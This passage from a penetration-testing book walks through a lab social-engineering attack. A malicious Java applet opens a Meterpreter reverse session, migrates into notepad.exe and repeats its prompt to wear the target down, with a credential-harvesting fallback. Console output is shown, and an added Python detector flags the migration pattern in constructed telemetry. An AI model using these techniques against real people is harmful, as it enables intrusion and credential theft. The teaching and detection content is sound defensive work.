Chapter 10
Figure 10-6: Multi-attack security warning
We have a backup attack, however. If the target clicks Run on the malicious Java applet, a Meterpreter session opens, and the target is redirected back to the original Gmail page. The attack is successful.
Notice that when the Java applet payload runs, we automatically migrate out of the applet's java.exe into a separate process, which happens to be notepad.exe (this is the 'migrate -f' autorun script in the output below: it spawns a fresh notepad.exe and moves the Meterpreter server into it). Because that process sits outside the browser's process tree, closing the browser kills java.exe but not our Meterpreter session. Migration is not persistence, though: the spawned notepad.exe still dies at logoff or reboot. Also, within the configuration file you can set the "Java Repeater" option, which will continue to prompt the target with the Java applet warning even if he clicks Cancel. This makes it more likely that the target will eventually click Run.
Once the exploit succeeds, the Meterpreter shell is presented to us, as shown below.
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at
Thu Sep 09 12:33:20 -0400 2010
[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: java.exe (824)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)
msf exploit(ms09_002_memory_corruption) >
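From the defender's side, the console output above is exactly what a process-telemetry rule should key on: a browser plugin host (java.exe) spawning a desktop utility, and that utility (notepad.exe) immediately making an outbound connection to the handler on port 443. The following is an added example for this section, not code from the book, SET or Metasploit. The event lines are constructed in a simplified Sysmon-like layout (assumed for the example, not real telemetry), and the lists of browser hosts and network-quiet utilities are assumptions you would tune to your environment.

```python
"""Flag the 'migrate -f' pattern (browser plugin host -> notepad.exe -> callback)
in process telemetry. Added example for this section; it is not code from the
book, SET or Metasploit, and the event lines below are constructed."""
from collections import defaultdict
from typing import Dict, List, Tuple

# Assumed lists for the example (not exhaustive): processes that host browser
# content or plugins, and desktop utilities that never need the network.
BROWSER_HOSTS = {"iexplore.exe", "java.exe", "firefox.exe", "plugin-container.exe"}
QUIET_UTILITIES = {"notepad.exe", "calc.exe", "mspaint.exe", "wordpad.exe"}

# Constructed sample telemetry in a simplified Sysmon-like layout:
# <event id>|<time>|Key=Value|...  (1 = process create, 3 = network connect).
# The PIDs and the 172.16.32.129:443 callback mirror the console output above.
SAMPLE_EVENTS = """\
1|12:33:18|ParentImage=C:\\Program Files\\Internet Explorer\\iexplore.exe|Image=C:\\Program Files\\Java\\jre6\\bin\\java.exe|ProcessId=824
1|12:33:20|ParentImage=C:\\Program Files\\Java\\jre6\\bin\\java.exe|Image=C:\\Windows\\System32\\notepad.exe|ProcessId=3044
3|12:33:20|Image=C:\\Windows\\System32\\notepad.exe|ProcessId=3044|DestinationIp=172.16.32.129|DestinationPort=443
1|12:35:02|ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\notepad.exe|ProcessId=3101
"""


def parse_event(line: str) -> Dict[str, str]:
    """Split one '|'-delimited event into a dict with 'id', 'time' and its Key=Value fields."""
    parts = line.strip().split("|")
    event = {"id": parts[0], "time": parts[1]}
    for kv in parts[2:]:
        key, _, value = kv.partition("=")
        event[key] = value
    return event


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(log_text: str) -> Dict[int, List[str]]:
    """Return {pid: [reasons]} for processes matching either migration indicator."""
    reasons: Dict[int, List[str]] = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        pid = int(ev["ProcessId"])
        image = basename(ev["Image"])
        if ev["id"] == "1":
            parent = basename(ev["ParentImage"])
            # Indicator 1: a browser/plugin host spawning a quiet utility is the
            # shape of 'migrate -f' ("Spawning a notepad.exe host process...").
            if parent in BROWSER_HOSTS and image in QUIET_UTILITIES:
                reasons[pid].append(f"{parent} spawned {image}")
        elif ev["id"] == "3":
            # Indicator 2: notepad.exe has no reason to talk to the network at all,
            # let alone to a remote port 443 right after being spawned.
            if image in QUIET_UTILITIES:
                reasons[pid].append(
                    f"{image} connected to {ev['DestinationIp']}:{ev['DestinationPort']}")
    return dict(reasons)


def migrated_sessions(log_text: str) -> List[Tuple[int, List[str]]]:
    """PIDs that trip both indicators, sorted; one indicator alone is only a lead."""
    return sorted((pid, why) for pid, why in detect(log_text).items() if len(why) >= 2)


if __name__ == "__main__":
    for pid, why in migrated_sessions(SAMPLE_EVENTS):
        print(f"PID {pid}: " + "; ".join(why))
```

The fourth sample event (explorer.exe launching notepad.exe, which then stays quiet) is the benign control: it trips neither indicator, while PID 3044 trips both. Requiring both before alerting is what keeps a user who actually opened Notepad from paging the on-call analyst.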
Now let's say that this attack fails, and the target clicks Cancel (without the repeater option enabled). He would then be prompted to enter his username and password into the username and password fields, allowing you to successfully harvest the credentials on the website and still have a successful